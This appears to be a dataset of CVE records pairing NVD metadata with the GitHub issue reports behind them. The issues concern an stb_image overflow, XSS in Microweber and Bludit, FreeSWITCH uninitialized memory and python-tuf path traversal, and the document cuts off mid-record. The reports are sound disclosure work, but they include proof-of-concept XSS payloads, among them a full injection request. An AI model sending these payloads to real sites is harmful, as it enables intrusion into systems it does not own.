"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/nothings/stb/issues/1108 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nothings",
"stb"
] | heap overflow by a craft jpeg file in stb_image.h:2099
poc [poc_hoob.zip](https://github.com/nothings/stb/files/6082734/poc_hoob.zip)
asan report:
```
==42271==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000559f20 at pc 0x00000051a2dd bp 0x7ffd06a9e900 sp 0x7ffd06a9e8f8
READ of size 4 at 0x000000559f20 thread T0
#0 0x51a2dc in stbi__extend_receive /home/kaka/fuzz/stb/tests/./../stb_image.h:2099:16
#1 0x518400 in stbi__jpeg_decode_block /home/kaka/fuzz/stb/tests/./../stb_image.h:2154:15
#2 0x517173 in stbi__parse_entropy_coded_data /home/kaka/fuzz/stb/tests/./../stb_image.h:2920:30
#3 0x5138d0 in stbi__decode_jpeg_image /home/kaka/fuzz/stb/tests/./../stb_image.h:3321:15
#4 0x510a21 in load_jpeg_image /home/kaka/fuzz/stb/tests/./../stb_image.h:3773:9
#5 0x4fe7b1 in stbi__jpeg_load /home/kaka/fuzz/stb/tests/./../stb_image.h:3930:13
#6 0x4f8b3f in stbi__load_and_postprocess_8bit /home/kaka/fuzz/stb/tests/./../stb_image.h:1203:19
#7 0x4f9d12 in stbi_load_from_memory /home/kaka/fuzz/stb/tests/./../stb_image.h:1373:11
#8 0x4fd734 in LLVMFuzzerTestOneInput /home/kaka/fuzz/stb/tests/stbi_read_fuzzer.c:19:26
#9 0x4f84fd in main /home/kaka/fuzz/stb/tests/fuzz_main.c:48:11
#10 0x7fd09b4ea83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
#11 0x41b038 in _start (/home/kaka/fuzz/stb/tests/image_fuzzer+0x41b038)
0x000000559f20 is located 32 bytes to the left of global variable '<string literal>' defined in './../stb_image.h:2198:33' (0x559f40) of size 22
'<string literal>' is ascii string 'can't merge dc and ac'
0x000000559f20 is located 0 bytes to the right of global variable 'stbi__jbias' defined in './../stb_image.h:2083:18' (0x559ee0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow /home/kaka/fuzz/stb/tests/./../stb_image.h:2099:16 in stbi__extend_receive
Shadow bytes around the buggy address:
0x0000800a3390: 00 04 f9 f9 f9 f9 f9 f9 00 04 f9 f9 f9 f9 f9 f9
0x0000800a33a0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 01 f9 f9 f9 f9 f9
0x0000800a33b0: 00 00 00 00 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9
0x0000800a33c0: 00 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9
0x0000800a33d0: 00 00 00 00 00 00 00 02 f9 f9 f9 f9 00 00 00 00
=>0x0000800a33e0: 00 00 00 00[f9]f9 f9 f9 00 00 06 f9 f9 f9 f9 f9
0x0000800a33f0: 00 04 f9 f9 f9 f9 f9 f9 00 00 05 f9 f9 f9 f9 f9
0x0000800a3400: 00 06 f9 f9 f9 f9 f9 f9 00 05 f9 f9 f9 f9 f9 f9
0x0000800a3410: 00 00 04 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x0000800a3420: 00 00 f9 f9 f9 f9 f9 f9 00 00 02 f9 f9 f9 f9 f9
0x0000800a3430: 00 00 05 f9 f9 f9 f9 f9 00 06 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==42271==ABORTING
``` | heap overflow in stb_image.h:2099 | https://api.github.com/repos/nothings/stb/issues/1108/comments | 2 | 2021-03-04T10:19:50Z | 2021-10-15T01:45:27Z | https://github.com/nothings/stb/issues/1108 | 821,985,137 | 1,108 | 2,703 |
CVE-2021-23449 | 2021-10-18T17:15:07.790 | This affects the package vm2 before 3.9.4 via a Prototype Pollution attack vector, which can lead to execution of arbitrary code on the host machine. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/issues/363"
},
{
"source": "report@snyk.io",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/releases/tag/3.9.4"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211029-0010/"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-VM2-1585918"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/issues/363"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/releases/tag/3.9.4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211029-0010/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-VM2-1585918"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "22C0E167-6242-41C5-9937-A435AE42AD3E",
"versionEndExcluding": "3.9.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/patriksimek/vm2/issues/363 | [
"Third Party Advisory"
] | github.com | [
"patriksimek",
"vm2"
] | Hi,
I would like to report a sandbox breakout, but I believe this should be done in a responsible, private way. Please create a security policy and an advisory, as instructed here: https://github.com/patriksimek/vm2/issues/338 | Sandbox breakout | https://api.github.com/repos/patriksimek/vm2/issues/363/comments | 4 | 2021-09-07T09:20:16Z | 2021-10-15T23:01:08Z | https://github.com/patriksimek/vm2/issues/363 | 989,776,033 | 363 | 2,704 |
CVE-2021-36513 | 2021-10-18T17:15:07.913 | An issue was discovered in function sofia_handle_sip_i_notify in sofia.c in SignalWire freeswitch before 1.10.6, may allow attackers to view sensitive information due to an uninitialized value. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/issues/1245"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://newreleases.io/project/github/signalwire/freeswitch/release/v1.10.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/issues/1245"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://newreleases.io/project/github/signalwire/freeswitch/release/v1.10.6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:signalwire:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82B8B23B-0388-4427-BF92-059D8573DC7F",
"versionEndExcluding": "1.10.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"909"
] | 909 | https://github.com/signalwire/freeswitch/issues/1245 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"signalwire",
"freeswitch"
] | There are a few uninitialized value use bugs in src/mode/endpoints/mod_sofia/sofia.c
In function sofia_handle_sip_i_notify():
Array network_ip will be allocated in line 859
```
857 if (sofia_test_pflag(profile, PFLAG_FORWARD_MWI_NOTIFY)) {
858 const char *mwi_status = NULL;
859 char network_ip[80];
```
Then, it will be initialized by sofi_glue_get_addr()
867 sofia_glue_get_addr(de->data->e_msg, network_ip, sizeof(network_ip), NULL);
868 for (x = 0; x < profile->acl_count; x++) {
869 last_acl = profile->acl[x];
870 if (!(acl_ok = switch_check_network_list_ip(network_ip, last_acl))) {
871 break;
However, sofi_glue_get_addr() may return earlier, leading network_ip in an uninitliazed state.
Then network_ip will be used in switch_check_network_list_ip(). It may bypass (ACL) security checks due to the uninitialized value of network_ip, leading to privilege escalation.
Same in:
```
1618 if (authorization) {
1619 char network_ip[80];
1620 int network_port;
1621 sofia_glue_get_addr(de->data->e_msg, network_ip, sizeof(network_ip), &network_port);
1622 auth_res = sofia_reg_parse_auth(profile, authorization, sip, de,
1623 (char *) sip->sip_request->rq_method_name, tech_pvt->key, strlen(tech_pvt->key), network_ip, network_port, NULL, 0,
1624 REG_INVITE, NULL, NULL, NULL, NULL);
1625 }
```
and in function sofia_handle_sip_i_reinvite()
```
10195 char network_ip[80];
10196 int network_port = 0;
10197 char via_space[2048];
10198 char branch[16] = "";
10199
10200 sofia_glue_store_session_id(session, profile, sip, 0);
10201
10202 sofia_clear_flag(tech_pvt, TFLAG_GOT_ACK);
10203
10204 sofia_glue_get_addr(de->data->e_msg, network_ip, sizeof(network_ip), &network_port);
10205 switch_stun_random_string(branch, sizeof(branch) - 1, "0123456789abcdef");
10206
10207 switch_snprintf(via_space, sizeof(via_space), "SIP/2.0/UDP %s;rport=%d;branch=%s", network_ip, network_port, branch);
```
and in function sofia_handle_sip_i_invite()
```
10311 char network_ip[80];
....
10394 sofia_glue_get_addr(de->data->e_msg, network_ip, sizeof(network_ip), &network_port);
10395
10396 switch_log_printf(SWITCH_CHANNEL_SESSION_LOG(tech_pvt->session), SWITCH_LOG_INFO, "%s receiving invite from %s:%d version: %s call-id: %s\n",
10397 switch_channel_get_name(tech_pvt->channel), network_ip, network_port, switch_version_full_human(), sip->sip_call_id ? switch_str_nil(sip->sip_call_id->i_id) : "");
10398
```
sofi_glue_get_addr() may return earlier, leading network_ip in an uninitialized state. Then network_ip will be used in
function switch_log_printf(). This function may print out sensitive data that network_ip contained from previous stack.
Fix: set network_ip[80] = " ", preventing from uninitlized value use.
Thank you for the review, I also report this bug to CVE.
| Usage-of-uninitialized value | https://api.github.com/repos/signalwire/freeswitch/issues/1245/comments | 3 | 2021-06-29T23:15:58Z | 2021-07-24T19:40:41Z | https://github.com/signalwire/freeswitch/issues/1245 | 933,172,641 | 1,245 | 2,705 |
CVE-2021-33988 | 2021-10-19T17:15:07.107 | Cross Site Scripting (XSS). vulnerability exists in Microweber CMS 1.2.7 via the Login form, which could let a malicious user execute Javascript by Inserting code in the request form. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nck0099/osTicket/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nck0099/osTicket/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microweber:microweber:1.2.7:*:*:*:*:*:*:*",
"matchCriteriaId": "93BB666C-22D1-42FB-B091-2C13141D4F64",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/nck0099/osTicket/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nck0099",
"osTicket"
] | **Microweber Reflected XSS**
**Vuln Description:**
_Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts._
**Impact: High**
_The impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data._
**POC:**
Identified un-Authenticated XSS on microweber CMS Version =< 1.2.7.
1.Post request is modified to insert XSS payload

2. XSS payload inserted in has been executed as shown in the snapshot.

**Request:**
`POST /latest/module/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.10/latest
Cookie: laravel_session=sZd2dncQHiqTHHF4nViZLVDVDEjgSQOk0XiKvxi9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 97
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
_confirm=1&captcha_parent_for_id=footer_newsletter&module='"()&%<acx><ScRiPt>alert(9803)</ScRiPt>`
Response:
`HTTP/1.1 200 OK
Date: Sun, 23 May 2021 18:43:25 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Cache-Control: no-cache, private
Set-Cookie: laravel_session=sZd2dncQHiqTHHF4nViZLVDVDEjgSQOk0XiKvxi9; expires=Sun, 23-May-2021 20:43:26 GMT; Max-Age=7200; path=/; httponly
Content-Length: 128
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<tag>mw_replace_back_this_module_1163675171-parser_modules227517859110</tag><ScRiPt>alert(9803)</ScRiPt>`
| Microweber CMS(1.2.7) Reflected XSS | https://api.github.com/repos/nck0099/osTicket/issues/2/comments | 1 | 2021-05-23T18:49:14Z | 2021-10-27T08:11:24Z | https://github.com/nck0099/osTicket/issues/2 | 899,083,420 | 2 | 2,706 |
CVE-2021-35323 | 2021-10-19T18:15:07.920 | Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/164990/Bludit-3.13.1-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/bludit/bludit/issues/1327"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/164990/Bludit-3.13.1-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/bludit/bludit/issues/1327"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2073F4B1-16F9-491D-A54E-5A1CBE9ED6F7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/bludit/bludit/issues/1327 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"bludit",
"bludit"
] | ### Describe your problem
I found a cross-site scripting attack on the login page http://localhost:800/admin/login
cross-site scripting is a vulnerability that allows an attacker to send malicious code(usually in javascript form)
to another user
Because a browser cannot know if the script should be trusted or not,
it will execute the script in user context allowing the attacker to access any cookies or sessions tokens retained
by the browser.
### Steps to reproduce the problem
1. open login page http://localhost:800/admin/login;
2. enter the username place ``admin"><img src=x onerror=alert(1)>`` and enter password
3. trigger the malicious javascript code
### Bludit version
bludit-3-13-1
### PHP version
PHP 7.4.15
| cross site script (xss) | https://api.github.com/repos/bludit/bludit/issues/1327/comments | 4 | 2021-05-27T17:35:01Z | 2021-11-15T03:15:38Z | https://github.com/bludit/bludit/issues/1327 | 904,020,030 | 1,327 | 2,707 |
CVE-2021-41131 | 2021-10-19T18:15:07.967 | python-tuf is a Python reference implementation of The Update Framework (TUF). In both clients (`tuf/client` and `tuf/ngclient`), there is a path traversal vulnerability that in the worst case can overwrite files ending in `.json` anywhere on the client system on a call to `get_one_valid_targetinfo()`. It occurs because the rolename is used to form the filename, and may contain path traversal characters (ie `../../name.json`). The impact is mitigated by a few facts: It only affects implementations that allow arbitrary rolename selection for delegated targets metadata, The attack requires the ability to A) insert new metadata for the path-traversing role and B) get the role delegated by an existing targets metadata, The written file content is heavily restricted since it needs to be a valid, signed targets file. The file extension is always .json. A fix is available in version 0.19 or newer. There are no workarounds that do not require code changes. Clients can restrict the allowed character set for rolenames, or they can store metadata in files named in a way that is not vulnerable: neither of these approaches is possible without modifying python-tuf. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 8.8,
"confidentialityImpact": "NONE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 9.2,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 4.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.8,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/theupdateframework/python-tuf/commit/4ad7ae48fda594b640139c3b7eae21ed5155a102"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/theupdateframework/python-tuf/issues/1527"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/theupdateframework/python-tuf/commit/4ad7ae48fda594b640139c3b7eae21ed5155a102"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/theupdateframework/python-tuf/issues/1527"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linuxfoundation:the_update_framework:*:*:*:*:*:python:*:*",
"matchCriteriaId": "6F0BDA96-F4FA-4C50-904E-56E5E3BE4B13",
"versionEndExcluding": null,
"versionEndIncluding": "0.18.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/theupdateframework/python-tuf/issues/1527 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"theupdateframework",
"python-tuf"
] | **Description of issue or feature request**:
Delegation role names are not restricted in any way in the spec, but they are targets metadata role names.
They could be `"."`, `"../../filename"` or `1.role`.
The problem is that at some point those delegation role names are used when constructing an URL used
to download the delegated target metadata file:
https://github.com/theupdateframework/tuf/blob/e9106b59cdb5bbfb4260c5ffc3144e79f8f9596a/tuf/ngclient/updater.py#L287 which is likely to be a problem.
**Current behavior**:
No validation is used for Delegation role names.
**Expected behavior**:
Escape special symbols like `.` or `\`.
| Metadata API: Delegation role names validation | https://api.github.com/repos/theupdateframework/python-tuf/issues/1527/comments | 15 | 2021-08-20T18:14:23Z | 2021-11-18T08:56:52Z | https://github.com/theupdateframework/python-tuf/issues/1527 | 975,822,427 | 1,527 | 2,708 |
CVE-2021-41167 | 2021-10-20T19:15:07.570 | modern-async is an open source JavaScript tooling library for asynchronous operations using async/await and promises. In affected versions a bug affecting two of the functions in this library: forEachSeries and forEachLimit. They should limit the concurrency of some actions but, in practice, they don't. Any code calling these functions will be written thinking they would limit the concurrency but they won't. This could lead to potential security issues in other projects. The problem has been patched in 1.0.4. There is no workaround. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nicolas-van/modern-async/commit/0010d28de1b15d51db3976080e26357fa7144436"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nicolas-van/modern-async/issues/5"
},
{
"source": "security-advisories@github.com",
"tags": [
